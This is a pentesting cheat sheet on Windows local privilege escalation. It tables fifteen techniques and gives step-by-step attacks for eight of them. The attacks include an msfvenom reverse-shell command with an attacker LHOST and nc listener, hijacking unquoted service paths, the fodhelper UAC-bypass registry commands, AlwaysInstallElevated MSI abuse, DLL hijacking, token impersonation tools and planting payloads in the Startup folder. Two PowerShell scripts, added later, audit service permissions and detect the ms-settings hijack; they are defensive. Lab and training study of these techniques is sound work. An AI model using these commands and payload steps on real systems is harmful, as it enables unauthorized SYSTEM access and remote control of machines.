1 AD Pentesting - Windows/Local Privilege Escalation



#   Technique                               Description
1   Unquoted Service Path                   Exploit unquoted paths to execute attacker's binary as SYSTEM
2   Insecure Service Permissions            Writable service binary/config or folders lead to privilege gain
3   DLL Hijacking in Services               Drop DLL in searched path loaded by a high-privilege service
4   Insecure Registry Permissions           Modifiable registry keys controlling service paths
5   Privileged Scheduled Tasks              SYSTEM tasks writable or replaceable by local user
6   AlwaysInstallElevated (MSI Abuse)       Misconfigured Windows Installer policy allows SYSTEM MSI installs
7   UAC Bypass (fodhelper, eventvwr, etc.)  Trusted binaries auto-elevate without prompt, abused to bypass UAC
8   Token Impersonation (SeImpersonate)     Impersonate privileged tokens via named pipes (e.g., PrintSpoofer)
9   Named Pipe Impersonation                SYSTEM service talks over pipe, attacker hijacks impersonation
10  Startup Folder Abuse                    Place payload in startup folder to auto-run on login
11  GPP Passwords                           Steal plaintext admin passwords from SYSVOL XML files
12  Credential Dumping + Token Reuse        Dump credentials from LSASS/SAM and reuse them (PtH, Over-PtH)
13  Executable in PATH Overwrite            Drop malicious binary where a service/app calls it from PATH
14  Weak Folder Permissions                 Replace or modify privileged service files or scripts in loose folders
15  Registry AutoRun Backdoors              Abuse AutoRun/RunOnce keys to persist or elevate


+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

1. Unquoted Service Path


Objective:

Exploit services with unquoted paths containing spaces, gaining code execution as SYSTEM.


1️⃣ Discovery – How to Find Vulnerable Services


🔹 Method 1: WMIC (caution: filtering on Auto misses demand-start services)


wmic service get name,displayname,pathname,startmode

⚠️ Do not rely only on | findstr "Auto" — it will miss services with StartMode = Demand.

✅ Use full output and visually inspect all services.


🔹 Method 2: PowerShell (full list, filters unquoted + spaced paths)


Get-WmiObject win32_service | Where-Object { $_.PathName -notmatch '^".*"$' -and $_.PathName -match " " } | Select-Object Name, StartMode, StartName, PathName
  • ✅ Finds both Auto-start and Demand-start services

  • ✅ Filters for unquoted and space-containing paths


🔹 Method 3: winPEAS (automated)

Run:

winPEASany.exe

Look under:

[+] Unquoted service paths

✅ Lists all vulnerable services regardless of start type


2️⃣ Checklist Per Service (What to Verify)

Check                                   Command
Path is unquoted                        sc qc <servicename>, inspect BINARY_PATH_NAME
Path contains spaces                    Visually confirm
Service runs as SYSTEM                  SERVICE_START_NAME = LocalSystem
Any folder in path is writable          icacls or accesschk.exe
File to hijack does not exist already   dir, where, Test-Path

3️⃣ Exploitation – Manual Steps


Step 1: Understand Search Order

For:


C:\Program Files\Vuln Service\svc.exe

Windows checks:

  1. C:\Program.exe

  2. C:\Program Files\Vuln.exe

  3. C:\Program Files\Vuln Service.exe

  4. ✅ If any exists, it runs before the actual:
    C:\Program Files\Vuln Service\svc.exe


Step 2: Drop Exploit Binary (Reverse Shell or Test EXE)


msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=4444 -f exe -o "Vuln Service.exe"

Drop to:


C:\Program Files\

(if that folder is writable and Vuln Service.exe is the matched path)


Step 3: Trigger the Service

A. If it's Auto-start:

  • Reboot the system

  • Payload will run at boot

B. If it's Demand-start (most common in labs):

Run as low-priv user:

sc start <servicename>

Step 4: Confirm SYSTEM Shell

Listener should receive a connection:

nc -lvnp 4444

Then:

whoami
nt authority\system

4️⃣ Variants and Edge Cases

Variant                                         Description
Auto-start                                      Payload runs at reboot
Demand-start                                    Must be manually started by attacker
Writable folder + no file exists                Place matching EXE in the search order
Service binary already exists at earlier path   Exploit not possible without deleting original file
Path has no spaces or is quoted                 Not vulnerable
Service doesn't run as SYSTEM                   Escalation may not be impactful

2. Insecure Service Permissions


🛠️ You find a service owned by SYSTEM, but guess what? You (a normal user) can replace the .exe file!
Now, when the service starts — it runs your payload instead of the original binary.

Steps:

  • Find modifiable services:
    accesschk.exe -uwcqv "Users" *

  • Replace the service binary with your malicious payload

  • Restart the service using sc stop / sc start

  • Catch SYSTEM shell when the service executes your payload
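Added audit script covering the checks in sections 1 and 2 (it is not from the original notes, and it is neither winPEAS nor accesschk): it flags every service whose binary is writable by ordinary users, and for each unquoted path containing spaces it computes the candidates CreateProcess tries before the real binary (each prefix that ends at a space, with .exe appended), flags any writable folder in that chain, and prints the sc.exe config command that quotes the path. The low-privilege groups (Everyone, Authenticated Users, BUILTIN\Users) and the write-rights mask are assumptions you may widen.

```powershell
# Added audit script, not part of the original notes. Run in an elevated PowerShell session
# on the host under review; it only reads service definitions and ACLs and prints the
# remediation command instead of applying it.
$LowPrivSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')  # Everyone, Authenticated Users, BUILTIN\Users (assumed)
$WriteRights = [int][System.Security.AccessControl.FileSystemRights]'CreateFiles, Modify, FullControl'
# True if an Allow ACE grants one of the low-privileged groups write access to $Path.
function Test-LowPrivWritable([string]$Path) {
    if (-not (Test-Path -LiteralPath $Path)) { return $false }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }
        if (($LowPrivSids -contains $sid) -and (([int]$ace.FileSystemRights -band $WriteRights) -ne 0)) { return $true }
    }
    return $false
}

# The executable part of a service PathName: everything up to and including the first ".exe".
function Get-ServiceExecutable([string]$PathName) {
    if ($PathName -match '^(.*?\.exe)') { $Matches[1] } else { $PathName }
}

# What CreateProcess tries, in order, for an unquoted path with spaces: each prefix that
# ends at a space, with ".exe" appended, before the real binary is reached.
function Get-SearchOrderCandidates([string]$PathName) {
    $parts = (Get-ServiceExecutable $PathName) -split ' '
    $candidates = @()
    for ($i = 1; $i -lt $parts.Count; $i++) {
        $candidates += (($parts[0..($i - 1)] -join ' ') + '.exe')
    }
    return $candidates
}

foreach ($svc in Get-CimInstance Win32_Service | Where-Object { $_.PathName }) {
    $exe = Get-ServiceExecutable $svc.PathName
    # Section 2 check: the service binary itself must not be writable by ordinary users.
    if (Test-LowPrivWritable $exe) {
        Write-Host "[!] $($svc.Name): binary $exe is writable by low-privileged users"
    }
    # Section 1 check: unquoted path with spaces, plus a writable folder in the search order.
    if ($svc.PathName -notmatch '^"' -and $exe -match ' ') {
        Write-Host "[*] $($svc.Name) ($($svc.StartMode), runs as $($svc.StartName)): unquoted '$($svc.PathName)'"
        foreach ($cand in Get-SearchOrderCandidates $svc.PathName) {
            $dir = Split-Path -Parent $cand
            if (Test-LowPrivWritable $dir) { Write-Host "    [!] $dir is writable; a planted $cand would run first" }
        }
        $rest = $svc.PathName.Substring($exe.Length)   # any arguments after the executable
        Write-Host "    fix: sc.exe config `"$($svc.Name)`" binPath= `"\`"$exe\`"$rest`""
    }
}
```

Review the fix line before running it: the escaped inner quotes are what make sc.exe store the path quoted, and services with arguments keep them after the closing quote.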


3. DLL Hijacking in Services


🎣 Some services load DLLs from relative paths like .\ or C:\Program Files\App\ — and they don’t check signatures.
You drop a malicious DLL with the expected name in a writable directory. Boom — it loads yours!

Steps:

  • Use ProcMon to trace missing DLLs loaded by service

  • Identify search path folders you can write to

  • Create DLL payload and name it as the missing DLL

  • Drop DLL into writable folder

  • Restart the service or trigger DLL load


4. AlwaysInstallElevated


📦 Windows has a weird legacy feature: if two registry keys are set to 1, any .MSI file you run gets SYSTEM power.
You become SYSTEM by packaging your shell into an .msi file. Old school, but still fun!

Steps:

  • Check these registry keys:
    reg query HKCU\Software\Policies\Microsoft\Windows\Installer\
    reg query HKLM\Software\Policies\Microsoft\Windows\Installer\
    ✅ AlwaysInstallElevated must be 1 under both keys

  • Generate malicious .msi with msfvenom or msbuild

  • Run:
    msiexec /quiet /i yourfile.msi

  • 💥 SYSTEM shell pops


5. UAC Bypass (fodhelper, eventvwr, etc.)


🔓 UAC tries to stop you from going admin, but Microsoft trusts some signed apps to auto-elevate without prompting.
🥷 You trick one (like fodhelper.exe) into launching your command by hijacking a registry key it reads when it starts.
No UAC prompt, no password, just SYSTEM power through the front door.

Steps:

  • Set registry key:
    reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /ve /d "cmd.exe" /f

  • Add DelegateExecute key:
    reg add HKCU\Software\Classes\ms-settings\Shell\Open\command /v DelegateExecute /f

  • Run: fodhelper.exe

  • Result: cmd.exe runs elevated without UAC prompt
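Added detection script for the registry hijack described above (not from the original notes): on a clean profile HKCU\Software\Classes\ms-settings does not exist at all, so its presence with a command under Shell\Open\command is the artifact to hunt for. It scans every loaded user hive under HKEY_USERS rather than only the current user; the -Remove switch is an assumed convenience that deletes the override.

```powershell
# Added detection/cleanup script, not part of the original notes. Scans every loaded user
# hive for the ms-settings handler override that fodhelper.exe honours; on a clean profile
# the key does not exist at all, so any hit deserves a look.
param([switch]$Remove)   # assumed convenience switch: delete what is found

$HijackSubKey = 'Software\Classes\ms-settings\Shell\Open\command'

function Find-MsSettingsHijack {
    if (-not (Get-PSDrive HKU -ErrorAction SilentlyContinue)) {
        New-PSDrive -Name HKU -PSProvider Registry -Root HKEY_USERS | Out-Null
    }
    $hits = @()
    # Only real account hives (S-1-5-21-...), not the *_Classes overlays or well-known SIDs.
    foreach ($hive in Get-ChildItem HKU:\ | Where-Object { $_.PSChildName -match '^S-1-5-21-\d+-\d+-\d+-\d+$' }) {
        $key = "HKU:\$($hive.PSChildName)\$HijackSubKey"
        if (-not (Test-Path -LiteralPath $key)) { continue }
        $props = Get-ItemProperty -LiteralPath $key
        $hits += [pscustomobject]@{
            UserSid         = $hive.PSChildName
            Command         = $props.'(default)'
            DelegateExecute = $null -ne $props.PSObject.Properties['DelegateExecute']
            Key             = $key
        }
    }
    return $hits
}

$found = @(Find-MsSettingsHijack)
if ($found.Count -eq 0) { Write-Host '[+] no ms-settings handler override in any loaded user hive'; return }
$found | Format-Table UserSid, Command, DelegateExecute -AutoSize
if ($Remove) {
    foreach ($h in $found) {
        # Delete the whole per-user ms-settings class so the shell falls back to the HKLM handler.
        Remove-Item -LiteralPath "HKU:\$($h.UserSid)\Software\Classes\ms-settings" -Recurse -Force
        Write-Host "[+] removed ms-settings override for $($h.UserSid)"
    }
}
```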


6. Token Impersonation (SeImpersonatePrivilege)


🎭 Some services let you wear someone else's mask if you have SeImpersonatePrivilege.
🪄 Tools like JuicyPotato, PrintSpoofer, or RoguePotato let you grab a SYSTEM token and run your own command as SYSTEM.

Steps:

  • Check privilege:
    whoami /priv → look for SeImpersonatePrivilege

  • Download and run PrintSpoofer or JuicyPotato

  • Set up reverse shell or command in tool arguments

  • Run exploit and gain SYSTEM shell


7. Named Pipe Impersonation


📡 Some services talk over named pipes: you hijack the pipe, pretend to be the server, and steal SYSTEM's identity.
🥷 Then you impersonate the SYSTEM token and spawn a shell as the king.

Steps:

  • Create a named pipe listener

  • Start a malicious service that connects to it

  • Hijack connection and impersonate token

  • Launch SYSTEM shell from impersonated token


8. Startup Folder Abuse


🚪 Anything you drop into the Startup folder will run the next time someone logs in.
If you have write access — drop a payload, wait for a reboot or login, and enjoy the ride.

Steps:

  • Navigate to:
    C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup

  • Drop payload (.exe, .bat, or shortcut) that runs your command

  • Log off or reboot system

  • Payload runs with user/session privileges
